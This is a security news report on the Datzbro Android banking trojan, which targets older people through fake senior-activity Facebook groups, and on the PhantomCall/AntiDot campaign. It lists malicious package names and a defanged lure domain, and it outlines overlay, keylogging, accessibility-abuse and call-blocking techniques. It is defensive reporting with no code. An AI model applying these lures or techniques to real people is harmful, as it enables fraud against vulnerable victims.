Cybersecurity researchers uncovered a previously undocumented Android banking trojan called Datzbro, which conducts device takeover (DTO) attacks and performs fraudulent transactions by preying on older people.
Dutch mobile security company ThreatFabric discovered the campaign in August 2025 after users in Australia reported scammers managing Facebook groups that promoted “active senior trips.” Moreover, the threat actors expanded their reach to Singapore, Malaysia, Canada, South Africa, and the U.K.
The campaigns specifically targeted older people searching for social activities, trips, in-person meetings, and similar events. To lure victims, these Facebook groups shared artificial intelligence (AI)-generated content and claimed to organize senior-friendly activities. When prospective targets showed interest, scammers quickly contacted them through Facebook Messenger or WhatsApp and persuaded them to download an APK file from a fraudulent link (e.g., “download.seniorgroupapps[.]com”).
“The fake websites prompted visitors to install a so-called community application, claiming it would allow them to register for events, connect with members, and track scheduled activities,” ThreatFabric said in a report shared with The Hacker News.
Interestingly, the websites also included placeholder links for downloading an iOS application, which indicated that attackers intended to target both major mobile operating systems. To achieve this, they distributed TestFlight apps for iOS and tricked victims into installing them.
When victims clicked the button to download the Android application, the link either directly deployed the malware or installed a dropper built with an APK binding service called Zombinder, which bypasses security restrictions on Android 13 and later.
Researchers identified several Android apps distributing Datzbro, including:
- Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
- Lively Years (orgLivelyYears.browses646)
- ActiveSenior (com.forest481.security)
- DanceWave (inedpnok.kfxuvnie.mggfqzhl)
- 作业帮 (io.mobile.Itool)
- 麻豆传媒 (fsxhibqhbh.hlyzqkd.aois)
- 麻豆传媒 (mobi.audio.aassistant)
- 谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
- MT管理器 (varuhphk.vadneozj.tltldo)
- MT管理器 (spvojpr.bkkhxobj.twfwf)
- 大麦 (mnamrdrefa.edldylo.zish)
- MT管理器 (io.red.studio.tracker)
Like other Android banking trojans, Datzbro carries extensive capabilities. It records audio, captures photos, accesses files and images, and enables financial fraud through remote control, overlay attacks, and keylogging. Furthermore, it exploits Android’s accessibility services to execute remote actions on the victim’s behalf.
A notable feature of Datzbro lies in its schematic remote control mode. This capability allows the malware to transmit details about all on-screen elements, including their position and content, so operators can re-create the layout on their end and take full control of the device.
In addition, the banking trojan disguises malicious activity with a semi-transparent black overlay containing custom text. It also steals lock screen PINs, along with passwords linked to Alipay and WeChat. Furthermore, Datzbro scans accessibility event logs to detect package names tied to banks or cryptocurrency wallets, as well as text strings containing passwords, PINs, or other sensitive codes.
“Such a filter clearly shows the focus of the developers behind Datzbro, not only using its Spyware capabilities, but also turning it into a financial threat,” ThreatFabric said. “With the help of keylogging capabilities, Datzbro can successfully capture login credentials for mobile banking applications entered by unsuspecting victims.”
Datzbro creators
Evidence suggests that a Chinese-speaking threat group developed Datzbro. Researchers reached this conclusion after finding Chinese debug and logging strings Embedded in the Malware’s source code. Unlike other malware families that rely on Web-based C2 panels, Datzbro’s Malicious apps connect to a Command-and-control (C2) backend designed as a Chinese-language desktop application.
ThreatFabric noted that a compiled version of the C2 app Surfaced on a public Virus-sharing platform, which suggests someone leaked the malware and made it freely available to Cybercriminals.
“The discovery of Datzbro highlights the evolution of mobile threats targeting unsuspecting users through social engineering campaigns,” the company said. “By focusing on seniors, fraudsters exploit trust and community-oriented activities to lure victims into installing malware. What begins as a seemingly harmless event promotion on Facebook can escalate into device takeover, credential theft, and financial fraud.”
Meanwhile, IBM X-Force Disclosed an Android banking malware campaign known as PhantomCall, part of the AntiDot malware family. This campaign targeted users of major financial institutions worldwide—including Spain, Italy, France, the U.S., Canada, the U.A.E., and India—by Spreading fake Google Chrome dropper apps. These apps bypass Android 13’s restrictions that normally prevent Sideloaded apps from abusing Accessibility APIs.
According to a June 2025 analysis by PRODAFT, AntiDot belongs to a Financially Motivated threat actor tracked as LARVA-398. The group offers the malware under a Malware-as-a-Service (MaaS) model across underground forums.
The latest PhantomCall campaign Leverages the CallScreeningService API to monitor Incoming calls and Selectively block them based on a Dynamically Generated list of numbers stored in the Device’s shared preferences. By doing so, Attackers prolong Unauthorized access, Finalize Fraudulent transactions, and delay Detection.
“PhantomCall also enables attackers to initiate fraudulent activity by silently sending USSD codes to redirect calls, while abusing Android’s CallScreeningService to block legitimate incoming calls, effectively isolating victims and enabling impersonation,” security researcher Ruby Cohen said.
“These capabilities play a critical role in orchestrating high-impact financial fraud by cutting off victims from real communication channels and enabling attackers to act on their behalf without raising suspicion.”
Source: TheHackerNews
Read more at Impreza News